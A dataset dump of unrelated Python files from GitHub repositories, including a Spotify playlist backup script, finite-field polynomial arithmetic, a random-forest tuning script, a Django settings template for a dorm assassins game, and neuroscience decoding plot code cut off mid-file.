new_playlist['id']\r\n\r\n if use_cover_image:\r\n image = spotify.playlist_cover_image(playlist_id)[0]['url']\r\n spotify.playlist_upload_cover_image(backup_id, get_as_base64(image))\r\n\r\n print(f\" Created backup playlist {backup_name}\")\r\n # get the tracks from the original playlist\r\n tracks = get_playlist_tracks(playlist_id)\r\n # add the tracks to the backup playlist\r\n spotify.playlist_add_items(backup_id, [track['track']['id'] for track in tracks])\r\n\r\n print(f\" Added {len(tracks)} tracks to backup playlist {backup_name}\")\r\n\r\n\r\ndef main():\r\n # delete_playlists()\r\n # playlists = get_all_playlists()\r\n # playlist_names = [playlist['name'] for playlist in playlists]\r\n # playlist_descriptions = [playlist['description'] for playlist in playlists]\r\n # return\r\n\r\n today = pd.Timestamp.today()\r\n monday = today - pd.Timedelta(days=today.dayofweek)\r\n dw_name = f'DW {str(monday)[:10]}'\r\n dw_description = '🤖 generated backup playlist for Discover Weekly'\r\n backup_playlist(\"Discover Weekly\", dw_name, dw_description, 2, False)\r\n\r\n rr_name = f'RR {str(monday)[:10]}'\r\n rr_description = '🤖 generated backup playlist for Release Radar'\r\n backup_playlist(\"Release Radar\", rr_name, rr_description, 2, True)\r\n\r\n # only do a full query if it's in the first 9 minutes of the hour\r\n # if it runs every 5 minutes, this will only run once per hour\r\n full_query = False\r\n if today.minute < 9:\r\n full_query = True\r\n\r\n tracks_df = get_saved_tracks(full_query)\r\n if ONLY_PROCESS_CURRENT_MONTH:\r\n tracks_df = tracks_df[tracks_df['added_at'] >= datetime.datetime.today().replace(day=1)]\r\n print(f\"Found {len(tracks_df)} tracks\")\r\n\r\n df_grouped = tracks_df.groupby('year_month')\r\n\r\n # name is YYYY-MM\r\n total_added = 0\r\n for name, group in df_grouped:\r\n group_len = group.shape[0]\r\n if group_len > 1:\r\n # make a new playlist if one with name doesn't exist\r\n playlist_id = get_playlist_id_by_key(year_month=name)\r\n\r\n # get the track ids in the playlist\r\n playlist_tracks = get_playlist_tracks(playlist_id)\r\n playlist_track_ids = [track['track']['id'] for track in playlist_tracks]\r\n\r\n # make a list of track ids\r\n track_ids = [x['id'] for x in group['track'].tolist()]\r\n # filter out the tracks that are already in the playlist\r\n track_ids = [track_id for track_id in track_ids if track_id not in playlist_track_ids]\r\n # remove duplicates\r\n track_ids = list(set(track_ids))\r\n\r\n if track_ids:\r\n spotify.playlist_add_items(playlist_id=playlist_id, items=track_ids)\r\n print(f\"Added {len(track_ids)} tracks to {name}\")\r\n total_added += len(track_ids)\r\n\r\n print(f\"Added {total_added} tracks to playlists\")\r\n\r\n\r\nif __name__ == '__main__':\r\n main()\r\n","repo_name":"bscholer/spotify-tools","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":22491,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"5046863312","text":"#!/usr/bin/env python\n\"\"\"\n\tScript that attempts creating a video from a series of pictures\n\"\"\"\n\nimport numpy as np\nimport cv2 as cv\nimport random\nimport sys\nimport os\n\nif not os.path.exists('video'):\n\tos.mkdir('video')\n\nfourcc = cv.VideoWriter_fourcc(*'XVID')\nout = cv.VideoWriter('video/new.avi', fourcc, 1, (640, 480), isColor=True)\n\nwhile True:\n\turl = ['images/0.jpeg', 'images/1.jpeg', 'images/2.jpeg']\n\tfile = cv.samples.findFile(url[random.randint(0, 2)])\n\timg = cv.imread(file)\n\n\tframe = cv.flip(img, 0)\n\n\tout.write(frame)\n\n\tcv.imshow(\"Video\", frame)\n\tif cv.waitKey(1) == ord(\"q\"):\n\t\tbreak\n\nout.release()\ncv.destroyAllWindows()\n","repo_name":"Ddilibe/Python-Miniprojects","sub_path":"Libraries/Opencv/createvideo.py","file_name":"createvideo.py","file_ext":"py","file_size_in_byte":635,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"26922707110","text":"from queue import Queue\n\nclass Node: \n def __init__(self, nodeVal = None, right=None, left=None):\n self.nodeVal = nodeVal\n self.right = right\n self.left = left\n\n\n############################################################################################\n\nclass BinaryTree:\n def __init__(self, value=None):\n self.root = Node(value)\n \n def breadth_first(self): \n if self.root is None: \n return \"Please enter a valid tree\"\n\n return_list = [] \n\n new_queue = Queue() \n new_queue.enqueue(self.root) \n\n while not new_queue.is_empty():\n current = new_queue.dequeue()\n\n if current is None:\n break\n\n return_list.append(current.nodeVal)\n\n if current.left is not None:\n new_queue.enqueue(current.left)\n\n if current.right is not None:\n new_queue.enqueue(current.right)\n return return_list\n\n\n\n\n# new_tree = BinaryTree()\n# new_tree.root = Node(\"A\")\n# new_tree.root.left = Node(\"B\")\n# new_tree.root.right = Node(\"C\")\n# new_tree.root.right.left = Node(\"F\") \n# new_tree.root.left.left = Node(\"D\") \n# new_tree.root.left.right = Node(\"E\") \n\n# print(new_tree.breadth_first())\n\n # a\n # b c\n# d e f\n\n# expected a b c d e f","repo_name":"SianCulligan/python-data-structures-and-algorithms","sub_path":"python/code_challenges/breadth-first/breadth_first/breadth_first.py","file_name":"breadth_first.py","file_ext":"py","file_size_in_byte":1346,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"21209125751","text":"import numpy as np\nimport pandas as pd\n\nfrom sklearn import ensemble\nfrom sklearn import metrics\nfrom sklearn import model_selection\n\nif __name__ == '__main__':\n \n df = pd.read_csv('../data/mobile-pricing/train.csv')\n X = df.drop('price_range', axis=1).values\n y = df['price_range'].values\n \n classifier = ensemble.RandomForestClassifier(n_jobs=-1)\n \n params = {\n 'n_estimators': np.arange(100,1500,100),\n 'max_depth': np.arange(1,31),\n 'criterion': ['gini', 'entropy']\n }\n \n model = model_selection.RandomizedSearchCV(estimator=classifier,\n param_distributions=params,\n scoring='accuracy',\n verbose=1,\n n_jobs=-1,\n cv=5)\n model.fit(X, y)\n print('Best score: {}'.format(model.best_score_))\n print('Best parameters set:')\n best_params = model.best_estimator_.get_params()\n for param in sorted(params.keys()):\n print(f'\\t{param}: {best_params[param]}')\n ","repo_name":"rootchile/ml-personal","sub_path":"src/tuning_random_search_rf.py","file_name":"tuning_random_search_rf.py","file_ext":"py","file_size_in_byte":1135,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"74072763306","text":"from poly import *\n\ndef prime_divisors(a):\n output = []\n\n while a % 2 == 0:\n a = a/2\n if 2 not in output:\n output.append(2)\n\n i = 3\n while a != 1:\n while a % i == 0:\n a = a/i\n if i not in output:\n output.append(i)\n i += 2\n\n return output\n\ndef exp_field(mod, mod_poly, a, b):\n z, s, p = [1], a, b\n\n while p > 0:\n if p % 2 == 1:\n z = multiply_poly(mod, z, s)\n p = p//2\n if p > 0:\n s = multiply_poly(mod, s, s)\n\n z = long_div_poly(mod, z, mod_poly)[1]\n\n return z\n\n# Produces the addition table of field F\ndef add_table(mod, mod_poly):\n deg = deg_poly(mod, mod_poly)\n table = [[]]\n\n for p in generate_polys(mod, deg - 1):\n table[0].append(p)\n\n for i in range(1, len(table[0])):\n table.append([])\n for p in table[0]:\n table[i].append(add_poly(mod, table[0][i], p))\n\n table = [[display_field(mod, mod_poly, p) for p in row] for row in table]\n rows = [', '.join(row) for row in table]\n return '{' + '; '.join(rows) + '}'\n\n# Produces the multiplication table of F\ndef mult_table(mod, mod_poly):\n deg = deg_poly(mod, mod_poly)\n table = [[]]\n\n for p in generate_polys(mod, deg - 1):\n table[0].append(p)\n\n for i in range(1, len(table[0])):\n table.append([])\n for p in table[0]:\n table[i].append(multiply_poly(mod, table[0][i], p))\n\n table[0] = [[0] for _ in table[0]]\n\n table = [[display_field(mod, mod_poly, p) for p in row] for row in table]\n rows = [', '.join(row) for row in table]\n return '{' + '; '.join(rows) + '}'\n\n# Give a representative of the following field element of F in standard form\ndef display_field(mod, mod_poly, a):\n while not deg_poly(mod, a) < deg_poly(mod, mod_poly):\n while not a[0] % mod_poly[0] == 0:\n a[0] += mod\n sub = mod_poly + [0] * (deg_poly(mod, a) - deg_poly(mod, mod_poly))\n sub = [x * a[0] // mod_poly[0] for x in sub]\n a = subtract_poly(mod, a, sub)\n a = [x % mod for x in a]\n return display_poly(mod, a)\n\n# Apply addution to the following element in F\ndef add_field(mod, mod_poly, a, b):\n addAB = add_poly(mod, a, b)\n output = long_div_poly(mod, addAB, mod_poly)[1]\n\n return output\n\n# Apply subtraction to the following elements in F\ndef subtract_field(mod, mod_poly, a, b):\n subtractAB = subtract_poly(mod,a, b)\n output = long_div_poly(mod, subtractAB, mod_poly)[1]\n\n return output\n\n# Apply multiplication to the following elements in F\ndef multiply_field(mod, mod_poly, a, b):\n multiplyAB = multiply_poly(mod,a, b)\n output = long_div_poly(mod, multiplyAB, mod_poly)[1]\n\n return output\n\n# Find a multiplicative inverse of the following element of F\ndef inverse_field(mod, mod_poly, a):\n [x, y, gcd] = euclid_poly(mod, a, mod_poly)\n\n if gcd == [1]:\n return add_field(mod, mod_poly, x, mod_poly)\n return \"ERROR\"\n\n# Apply division of the first field element by the second one\ndef division_field(mod, mod_poly, a, b):\n inverseB = inverse_field(mod, mod_poly, b)\n if inverseB == \"ERROR\":\n return \"ERROR\"\n output = multiply_field(mod, mod_poly, a, inverseB)\n return output\n\n# Test whether the following elements of F are equal\ndef equals_field(mod, mod_poly, a, b):\n equals = False\n if (mod != [0]):\n if (a != [0]):\n poly1 = long_div_poly(mod, a, mod_poly)[1]\n\n if (b != [0]):\n poly2 = long_div_poly(mod, a, mod_poly)[1]\n\n if (poly1 == poly2):\n equals = True\n\n return equals # True or False\n\n# Test whether the following field element is primitive\ndef primitive(mod, mod_poly, a):\n deg = deg_poly(mod, a)\n q = mod**deg\n\n primDivs = prime_divisors(q-1)\n #print(primDivs)\n\n k = len(primDivs)\n\n i = 0\n while i < k and exp_field(mod, mod_poly, a, (q-1)/primDivs[i]) != [1]:\n i += 1\n return i >= k\n\n# Give a primitive element of F\ndef find_prim(mod, mod_poly):\n if not irreducible(mod, mod_poly):\n return \"ERROR\"\n\n poly = random_poly(mod, deg_poly(mod, mod_poly)-1)\n\n while not primitive(mod, mod_poly, poly):\n poly = random_poly(mod, deg_poly(mod, mod_poly)-1)\n\n output = poly\n return output\n\n# print(add_table(2, [1, 1, 1]))\n# print(mult_table(2, [1, 1, 1])) THIS IS NOT CORRECT\n# print(add_table(7, [1, 0]))\n# print(mult_table(7, [1, 0])) THIS IS NOT CORRECT\n\n# print(display_field(5, [1, 0, 2], [1, 1])) THIS IS NOT CORRECT YET\n# print(display_field(5, [1, 0, 2], [1, 0, 0])) THIS IS NOT CORRECT YET\n# print(display_field(7, [2, -2], [1, 1, 1])) THIS IS NOT CORRECT YET\n\n# print(add_field(2, [1, 1, 1], [1, 1], [1, 0]))\n# print(add_field(7, [2, -2], [1, 1, 1], [2]))\n\n# print(subtract_field(3, [1, 0, 2, 1], [1, 1, 2], [2, 0, 1]))\n\n# print(multiply_field(3, [1, 0, 2, 1], [1, 1], [1, 2]))\n# print(multiply_field(3, [1, 0, 2, 1], [1, 0, 0], [1, 0]))\n\n# print(inverse_field(2, [1, 1, 1], [1, 0]))\n# print(inverse_field(2, [1, 1, 0], [1, 0]))\n\n# print(division_field(2, [1, 1, 1], [1, 0], [1, 0]))\n# print(division_field(2, [1, 1, 1], [1], [1, 0]))\n# print(division_field(2, [1, 1, 1], [1], [0]))\n\n# print(equals_field(5, [1, 0, 2], [1, 0, 0], [3]))\n\n# print(primitive(7, [1, 0, 0, 2], [1, 0]))\n# print(primitive(7, [1, 0, 0, 2], [1, 0, 1]))\n\n# print(find_prim(7, [1, 0, 6]))\n# print(find_prim(7, [1, 0, 0, 2]))\n# print(find_prim(7, [1, 0, 1]))\n","repo_name":"ave-ottens/2WF90","sub_path":"Assignment 2/field.py","file_name":"field.py","file_ext":"py","file_size_in_byte":5455,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"18162402066","text":"#! /usr/bin/env python3\n\n\"\"\"Apply labels to brightest objects found\"\"\"\n\nimport argparse\nimport sys\nimport remdefaults\nimport find_results\n\nparsearg = argparse.ArgumentParser(description='Provide labels to brightest objects found', formatter_class=argparse.ArgumentDefaultsHelpFormatter)\nparsearg.add_argument('file', nargs=1, type=str, help='Findres file')\nremdefaults.parseargs(parsearg, tempdir=False, inlib=False)\nparsearg.add_argument('--minmag', type=float, default=15.0, help='Minimum magnitude to find')\nparsearg.add_argument('--filter', type=str, help='Filter to limit to otherwise take brightest')\nparsearg.add_argument('--verbose', action='store_true', help='Tell everything')\n\nresargs = vars(parsearg.parse_args())\nfile = resargs['file'][0]\nminmag = resargs['minmag']\nfilt = resargs['filter']\nverbose = resargs['verbose']\n\nif filt is None:\n magset = set('griz')\nelse:\n magset = set(filt)\n\nmydb, dbcurs = remdefaults.opendb()\n\ntry:\n findres = find_results.load_results_from_file(file)\n targfr = findres.get_targobj()\nexcept find_results.FindResultErr as e:\n print(\"Cannot open\", file, \"error was\", e.args[0], file=sys.stderr)\n sys.exit(10)\n\nalready_got = findres.get_label_set(dbcurs)\nmag_to_fr = dict()\nfor fr in findres.results(idonly=True):\n if fr.obj.valid_label():\n continue\n mag = 1e9 # Should be a lesser value than that\n for m in magset:\n mf = getattr(fr.obj, m + 'mag', None)\n if mf is not None and mf < mag:\n mag = mf\n if mag < minmag:\n if mag in mag_to_fr:\n mag_to_fr[mag].append(fr)\n else:\n mag_to_fr[mag] = [fr]\n\nif len(mag_to_fr) == 0:\n print(\"No labels to assign in\", file, file=sys.stderr)\n sys.exit(11)\n\nfor mag in sorted(mag_to_fr.keys()):\n for fr in mag_to_fr[mag]:\n fr.assign_label(dbcurs, already_got) # NB updates already_got\n if verbose:\n print(\"Assigned label\", fr.label, \"to\", fr.obj.dispname, file=sys.stderr)\n\nfindres.reorder()\nfindres.relabel()\nfind_results.save_results_to_file(findres, file, force=True)\nmydb.commit()\n","repo_name":"JohnMCollins/python-astro-progs","sub_path":"Numpy/remfits2/label_brightest_finds.py","file_name":"label_brightest_finds.py","file_ext":"py","file_size_in_byte":2110,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"19992271970","text":"# Django settings for assassins_project project.\n\nDEBUG = True\nTEMPLATE_DEBUG = DEBUG\n\nMANAGERS = ADMINS\n\nDATABASES = {\n 'default': {\n 'ENGINE': 'django.db.backends.', # Add 'postgresql_psycopg2', 'mysql', 'sqlite3' or 'oracle'.\n 'NAME': '', # Or path to database file if using sqlite3.\n 'USER': '', # Not used with sqlite3.\n 'PASSWORD': '', # Not used with sqlite3.\n 'HOST': '', # Set to empty string for localhost. Not used with sqlite3.\n 'PORT': '', # Set to empty string for default. Not used with sqlite3.\n }\n}\n\n\n#Assassins configurations\nADMIN_SUNETID = [''] #note that if you are an admin, some of the features won't work if you try to play (such as confirming death)\nTERMINATION_START = 48 # the number of hours that an assassin has to make their kill.\nDEFEND_TIME = 15 # the time in minutes that a target is safe after shooting their assassin.\nDORM_NAME = ''\n\n# Webauth configuration\nWEBAUTH_SHARED_SECRET = '' # just some random secret\nWEBAUTH_URL = '' # i.e. http://www.stanford.edu/~USERNAME/cgi-bin/wa-authenticate.php\nLOGIN_URL = '/webauth/login'\nSESSION_EXPIRE_AT_BROWSER_CLOSE = True\nBASE_URL = '' # i.e. http://www.google.com/\n\n# Email configuration\nEMAIL_HOST = ''\nEMAIL_PORT = ''\nEMAIL_HOST_USER = ''\nEMAIL_HOST_PASSWORD = ''\nEMAIL_USE_TLS = True\nDEFAULT_FROM_EMAIL = ''\n\nMEDIA_ROOT = '' # should be /path/to/project/media/\nMEDIA_URL = '/media/'\nSTATIC_ROOT = '' # should be /path/to/project/static/\nSTATIC_URL = '/static/'\n\n# Make sure you add the MEDIA_URL and STATIC_URL to your Apache2 site config\n# as an alias to the MEDIA_ROOT and STATIC_ROOT\n\n\n# Local time zone for this installation. Choices can be found here:\n# http://en.wikipedia.org/wiki/List_of_tz_zones_by_name\n# although not all choices may be available on all operating systems.\n# On Unix systems, a value of None will cause Django to use the same\n# timezone as the operating system.\n# If running in a Windows environment this must be set to the same as your\n# system time zone.\nTIME_ZONE = 'America/Los_Angeles'\n\n# Language code for this installation. All choices can be found here:\n# http://www.i18nguy.com/unicode/language-identifiers.html\nLANGUAGE_CODE = 'en-us'\n\nSITE_ID = 1\n\n# If you set this to False, Django will make some optimizations so as not\n# to load the internationalization machinery.\nUSE_I18N = True\n\n# If you set this to False, Django will not format dates, numbers and\n# calendars according to the current locale.\nUSE_L10N = True\n\n# If you set this to False, Django will not use timezone-aware datetimes.\nUSE_TZ = True\n\n# List of finder classes that know how to find static files in\n# various locations.\nSTATICFILES_FINDERS = (\n 'django.contrib.staticfiles.finders.FileSystemFinder',\n 'django.contrib.staticfiles.finders.AppDirectoriesFinder',\n)\n\n# Make this unique, and don't share it with anybody.\nSECRET_KEY = ''\n\n# List of callables that know how to import templates from various sources.\nTEMPLATE_LOADERS = (\n 'django.template.loaders.filesystem.Loader',\n 'django.template.loaders.app_directories.Loader',\n)\n\nMIDDLEWARE_CLASSES = (\n 'django.contrib.sessions.middleware.SessionMiddleware',\n 'webauth.middleware.WebauthMiddleware',\n)\n\nROOT_URLCONF = 'assassins_project.urls'\n\n# Python dotted path to the WSGI application used by Django's runserver.\nWSGI_APPLICATION = 'assassins_project.wsgi.application'\n\nTEMPLATE_DIRS = (\n # Put strings here, like \"/home/html/django_templates\" or \"C:/www/django/templates\".\n # Always use forward slashes, even on Windows.\n # Don't forget to use absolute paths, not relative paths.\n 'assassins/templates',\n)\n\nINSTALLED_APPS = (\n 'django.contrib.auth',\n 'django.contrib.contenttypes',\n 'django.contrib.sessions',\n 'django.contrib.sites',\n 'django.contrib.messages',\n 'django.contrib.staticfiles',\n 'assassins',\n 'webauth',\n)\n\n# A sample logging configuration. The only tangible logging\n# performed by this configuration is to send an email to\n# the site admins on every HTTP 500 error when DEBUG=False.\n# See http://docs.djangoproject.com/en/dev/topics/logging for\n# more details on how to customize your logging configuration.\nLOGGING = {\n 'version': 1,\n 'disable_existing_loggers': False,\n 'filters': {\n 'require_debug_false': {\n '()': 'django.utils.log.RequireDebugFalse'\n }\n },\n 'handlers': {\n 'mail_admins': {\n 'level': 'ERROR',\n 'filters': ['require_debug_false'],\n 'class': 'django.utils.log.AdminEmailHandler'\n }\n },\n 'loggers': {\n 'django.request': {\n 'handlers': ['mail_admins'],\n 'level': 'ERROR',\n 'propagate': True,\n },\n }\n}\n","repo_name":"pcostell/assassins-django","sub_path":"assassins_project/settings.py","file_name":"settings.py","file_ext":"py","file_size_in_byte":4826,"program_lang":"python","lang":"en","doc_type":"code","stars":3,"dataset":"github-code","pt":"37"} +{"seq_id":"38732885802","text":"import numpy as np\nimport scipy.stats as sps\nimport matplotlib.pyplot as plt\nimport matplotlib.gridspec as gs\nimport pickle\nfrom scikits.bootstrap import bootstrap as boot\nimport seaborn as sns\n\n##############################################################################\n#\t\t\t\tFUNCTIONS FOR PLOTTING AND STATISTICAL TESTS\t #\n##############################################################################\n\ndef sig_bar(ax,sigs,axis,y,color):\n\tw=np.diff(axis)[0]\n\tcontinuity=np.diff(sigs)\n\tfor i,c in enumerate(continuity):\n\t\tbeg = axis[sigs[i]]-w/2\n\t\tend = beg+w\n\t\tax.fill_between([beg,end],[y[0],y[0]],[y[1],y[1]],color=color)\n\ndef boot_test(data, thr=0, n_samples=1000000):\n\tdata \t\t= np.array(data)\t\n\tt_data \t= np.nanmean(data) - thr\n\tboot_data \t= data[boot.bootstrap_indexes_array(data, n_samples=n_samples)]\n\tt_boot \t\t= (np.nanmean(boot_data,1) - np.nanmean(data))\n\tp \t\t\t= np.nanmean(abs(t_data)<=abs(t_boot))\n\treturn p, np.percentile(np.mean(boot_data,1),[2.5,97.5])\n\n\n##############################################################################\n#\t\t\t\t\t\t\tLOAD DATA FOR PLOTTING\t \t\t #\n##############################################################################\n\nwith open('preprocessed_data/cross_decoders.pkl', 'rb') as f: \n dtime, delay, resp, sig_005, t_delay = pickle.load(f)\n\nwith open('preprocessed_data/crossmatrix_decoders.pkl', 'rb') as f:\n mtime, matrix = pickle.load(f)\n\nwith open('preprocessed_data/serial_bias.pkl', 'rb') as f:\n xxx, serial, sigpos, signeg = pickle.load(f)\n\n\n##############################################################################\n#\t\t\t\t\t\t\tSETTINGS FOR PLOTTING\t \t\t #\n##############################################################################\n\nnp.set_printoptions(precision=4)\nsns.set_context(\"talk\", font_scale=1)\nsns.set_style(\"ticks\")\n\norange \t= sns.xkcd_rgb[\"orange\"]\ngreenish = sns.xkcd_rgb[\"greenish\"]\ndeepblue = sns.xkcd_rgb[\"deep blue\"]\npalered = sns.xkcd_rgb[\"pale red\"]\n\n\n##############################################################################\n#\t\t\t\t\t\t\tSET UP FIGURE LAYOUT\t \t\t #\n##############################################################################\n\nplt.figure(figsize=(9,8.5))\n\ngs1 = gs.GridSpec(3, 7)\ngs1.update(bottom=.56, wspace=1)\nax1 = plt.subplot(gs1[:,:3])\nax2 = plt.subplot(gs1[:,3:6])\nax22 = plt.subplot(gs1[:,-1])\n\ngs2\t= gs.GridSpec(1,3, width_ratios=[2, 1, 3])\ngs2.update(top=.45, right=.7)\nax6 = plt.subplot(gs2[0])\nax7 = plt.subplot(gs2[1])\nax8 = plt.subplot(gs2[2])\n\ngs3 = gs.GridSpec(3, 1)\ngs3.update(top=.45, left=.8)\nax3 = plt.subplot(gs3[0,-1])\nax4 = plt.subplot(gs3[1,-1])\nax5 = plt.subplot(gs3[2,-1])\n\n\n##############################################################################\n#\t\t\t\t\t\tPLOT DELAY AND RESPONSE DECODER\t \t\t \t #\n##############################################################################\n\nlate \t= np.where((dtime[1,:]==0) & (dtime[0,:]>.65) & (dtime[0,:]<.85))[0]\nclick \t= np.where((dtime[1,:]==2) & (dtime[0,:]>-.1) & (dtime[0,:]<.1))[0]\nreig \t= np.where((dtime[1,:]==3) & (dtime[0,:]>-.95) & (dtime[0,:]<-.75))[0]\n\nnsubs \t= delay.shape[0]\n\ntimes \t= np.where((dtime[1,:]==0) & (dtime[0,:]>.25) & (dtime[0,:]<1.5))[0]\nS \t\t= np.where((dtime[1,:]==3) & (dtime[0,:]>0) & (dtime[0,:]<.25))[0]\nax6.plot(dtime[0,times], np.mean(delay,0)[times], color = 'k')\nax6.fill_between(dtime[0,times], np.mean(delay,0)[times] + 2*sps.sem(delay,0)[times],\n\tnp.mean(delay,0)[times] - 2*sps.sem(delay,0)[times], color='grey', alpha=.5)\nax6.plot(dtime[0,times], np.mean(resp,0)[times],'k', alpha=.5)\nax6.plot(dtime[0,times], np.zeros(len(times)), 'k--', alpha=.3)\nax6.plot(dtime[0,late], np.zeros(len(dtime[0,late]))-.015, 'o', color=palered)\nsig_bar(ax6,np.where(sig_005[times])[0],dtime[0,times],[.19,.2], 'k')\nax6.plot(dtime[0,S[0]], -.195, 'k^', ms=14)\nax6.set_xlim([.25,1.25])\nax6.set_xticks([.5,1])\nax6.set_ylim([-.2,.2])\nax6.set_yticks([-.2,-.1,0,.1,.2])\nax6.set_ylabel('decoding strength (a.u.)')\nax6.get_yaxis().set_tick_params(direction='in')\nax6.get_xaxis().set_tick_params(direction='in')\nsns.despine(ax=ax6)\n\ntimes \t= np.where((dtime[1,:]==2) & (dtime[0,:]>-.3) & (dtime[0,:]<.3))[0]\nR \t\t= np.where((dtime[1,:]==2) & (dtime[0,:]>0))[0][0]\nax7.plot(dtime[0,times], np.mean(delay,0)[times], color='k')\nax7.fill_between(dtime[0,times], np.mean(delay,0)[times] + 2*sps.sem(delay,0)[times],\n\tnp.mean(delay,0)[times] - 2*sps.sem(delay,0)[times], color='grey', alpha=.5)\nax7.plot(dtime[0,times], np.mean(resp,0)[times], 'k', alpha=.5)\nax7.plot(dtime[0,times], np.zeros(len(times)), 'k--', alpha=.3)\nax7.plot(dtime[0,click], np.zeros(len(dtime[0,click]))-.015, 'o', color=deepblue)\nsig_bar(ax7,np.where(sig_005[times])[0],dtime[0,times],[.19,.2], 'k')\nax7.plot(dtime[0,R], -.195, 'k^', ms=14)\nax7.text(-.23, -.17, r'$(R_{n-1})$') \nax7.text(-.23, -.13, 'report') \nax7.set_ylim([-.2,.2])\nax7.set_xlim([-.25,.25])\nax7.set_xticks([-.25,.25])\nax7.set_xlabel('time from point of alignment (s)')\nax7.set_yticks([])\nax7.get_xaxis().set_tick_params(direction='in')\nsns.despine(ax=ax7, left=True)\n\ntimes \t= np.where((dtime[1,:]==3) & (dtime[0,:]>-1.5) & (dtime[0,:]<.5))[0]\nF \t\t= np.where((dtime[1,:]==3) & (dtime[0,:]>-1.1))[0][0]\nS \t\t= np.where((dtime[1,:]==3) & (dtime[0,:]>0) & (dtime[0,:]<.25))[0]\nax8.plot(dtime[0,times], np.mean(delay,0)[times], color='k')\nax8.fill_between(dtime[0,times], np.mean(delay,0)[times] + 2*sps.sem(delay,0)[times],\n\tnp.mean(delay,0)[times] - 2*sps.sem(delay,0)[times], color='grey', alpha=.5,\n\tlabel='delay code')\nax8.plot(dtime[0,times], np.mean(resp,0)[times], 'k', alpha=.5, \n\tlabel='response code')\nax8.plot(dtime[0,times], np.zeros(len(times)), 'k--', alpha=.3)\nax8.fill_between(dtime[0,S], np.zeros(len(S))-.2, np.zeros(len(S))+.2, \n\tcolor='grey', alpha=.2)\nax8.plot(dtime[0,reig], np.zeros(len(dtime[0,reig]))-.015, 'o', color=orange)\nsig_bar(ax8,np.where(sig_005[times])[0],dtime[0,times],[.19,.2], 'k')\nax8.plot(dtime[0,F], -.195, 'k^', ms=14)\nax8.plot(dtime[0,S[0]], -.195, 'k^', ms=14)\nax8.text(-1.25, -.13, 'fixation on')\nax8.text(-.3, -.13, 'stim on')\nax8.text(-1.250, -.17, r'$(F_n)$') \nax8.text(-.1, -.17, r'$(S_n)$')\nax8.set_ylim([-.2,.2])\nax8.set_xlim([-1.25,.25])\nax8.set_xticks([-1,-.5,0])\nax8.set_yticks([-.2,-.1,0,.1,.2]); ax8.set_yticklabels([])\nsns.despine(ax=ax8, left=True, right=False)\nax8.legend(frameon=False)\nax8.get_yaxis().set_tick_params(direction='in')\nax8.get_xaxis().set_tick_params(direction='in')\n\n\n##############################################################################\n#\t\t\t\t\t\t\tPLOT DELAY TUNING CURVES\t \t\t \t #\n##############################################################################\n\ntun \t= np.roll(np.mean(np.mean(t_delay,0)[:,late],1),4)\ntun \t= np.append(tun, tun[0]) - np.mean(tun)\nse \t\t= np.roll(np.std(np.mean(t_delay[:,:,late],2),0),4)/np.sqrt(nsubs)\nse \t\t= np.append(se, se[0])\nax3.plot(np.arange(9), tun, color=palered)\nax3.fill_between(np.arange(9), tun+se, tun-se, color=palered, alpha=.3)\nax3.plot(np.arange(9), np.zeros(9), 'k--', alpha=.3)\nax3.set_ylim([-.5,.5])\nax3.set_xlim([0,8])\nax3.set_yticks([-.5,0,.5]); ax3.set_yticklabels([])\nsns.despine(ax=ax3, left=True, right=False)\nax3.get_yaxis().set_tick_params(direction='in')\nax3.get_xaxis().set_tick_params(direction='in')\nax3.set_xticks([4]); ax3.set_xticklabels([''])\n\nprint(boot_test(np.mean(t_delay[:,:,late],2)[:,0]-np.mean(t_delay[:,:,late],2)[:,4], n_samples=10000000))\n\ntun \t= np.roll(np.mean(np.mean(t_delay,0)[:,click],1),4)\ntun \t= np.append(tun, tun[0]) - np.mean(tun)\nse \t\t= np.roll(np.std(np.mean(t_delay[:,:,click],2),0),4)/np.sqrt(nsubs)\nse \t\t= np.append(se, se[0])\nax4.plot(np.arange(9), tun, color=deepblue)\nax4.fill_between(np.arange(9), tun+se, tun-se, color=deepblue, alpha=.3)\nax4.plot(np.arange(9), np.zeros(9), 'k--', alpha=.3)\nax4.set_ylim([-.5,.5])\nax4.set_xlim([0,8])\nax4.set_yticks([-.5,0,.5])\nax4.set_ylabel('tuning to previous stimulus')\nsns.despine(ax=ax4, left=True, right=False)\nax4.get_yaxis().set_tick_params(direction='in')\nax4.get_xaxis().set_tick_params(direction='in')\nax4.yaxis.set_label_position(\"right\")\nax4.set_xticks([4]); ax4.set_xticklabels([''])\n\nprint(boot_test(np.mean(t_delay[:,:,click],2)[:,0]-np.mean(t_delay[:,:,click],2)[:,4], n_samples=10000000))\n\ntun \t= np.roll(np.mean(np.mean(t_delay,0)[:,reig],1),4)\ntun \t= np.append(tun, tun[0]) - np.mean(tun)\nse \t\t= np.roll(np.std(np.mean(t_delay[:,:,reig],2),0),4)/np.sqrt(nsubs)\nse \t\t= np.append(se, se[0])\nax5.plot(np.arange(9), tun, color=orange)\nax5.fill_between(np.arange(9), tun+se, tun-se, color=orange, alpha=.3)\nax5.plot(np.arange(9), np.zeros(9), 'k--', alpha=.3)\nax5.set_ylim([-.5,.5])\nax5.set_xlim([0,8])\nax5.set_yticks([-.5,0,.5]); ax5.set_yticklabels([])\nax5.set_xticks([0,4,8]); ax5.set_xticklabels([-180,0,180])\nsns.despine(ax=ax5, left=True, right=False)\nax5.get_yaxis().set_tick_params(direction='in')\nax5.get_xaxis().set_tick_params(direction='in')\nax5.set_xlabel('presented cue')\n\nprint(boot_test(np.mean(t_delay[:,:,reig],2)[:,0]-np.mean(t_delay[:,:,reig],2)[:,4], n_samples=10000000))\n\n##############################################################################\n#\t\t\t\t\tPLOT CROSS-TEMPORAL DECODING MATRIX\t \t\t \t #\n##############################################################################\n\nvalid = np.where(((mtime[1,:]==0) & (mtime[0,:]>-.3) & (mtime[0,:]<1.3))| \n\t\t((mtime[1,:]==2) & (mtime[0,:]>-.3) & (mtime[0,:]<.3)) | \n\t\t((mtime[1,:]==3) & (mtime[0,:]>-1.3) & 